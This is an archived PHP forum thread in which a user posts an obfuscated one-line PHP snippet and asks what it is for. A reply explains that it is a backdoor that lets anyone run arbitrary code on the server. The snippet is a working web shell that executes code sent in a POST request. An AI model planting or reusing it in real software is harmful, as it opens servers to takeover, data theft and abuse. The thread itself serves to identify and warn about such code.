Jump to content

What Is This Code Used For?


Lejong

Recommended Posts

Hey guy's, Can anybody tell me what this is used for?

 



<?php 
error_reporting(0);$_=i_find_it_fun_to_create;$__=$_[2].$_[11].chr(119-9).$_[17].$_[14].chr(105).$_[15].chr(110).chr(95).$_[17].chr(110+4).chr(101).chr(97).$_[21].chr(101);$_=explode(chr(95),$__);$__=$_[1].chr(95).$_[0];$_=$__(null,array_pop($_POST));$_();

Link to comment
https://forums.phpfreaks.com/topic/270959-what-is-this-code-used-for/
Share on other sites

PHP disagrees with you: Parsing Error: /Applications/MAMP/htdocs/file.php line 2 - syntax error, unexpected T_VARIABLE

 

EDIT: Nevermind, the code has been changed from what it originally was.

EDIT: Nevermind, the code has been changed from what it originally was.

Don't you just love it when that happens?

 

Since Lejong asked, the purpose of that code is to allow anyone to run whatever code they want on your server. If I knew that page was there then I could dump your database, insert and delete whatever information I wanted, look at other files on your server, install more exploits in your site (or server), hijack the site for spam or phishing, run up huge bills in your name... pretty much anything I felt like.

 

You said your friend gave that to you? Some friend.

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.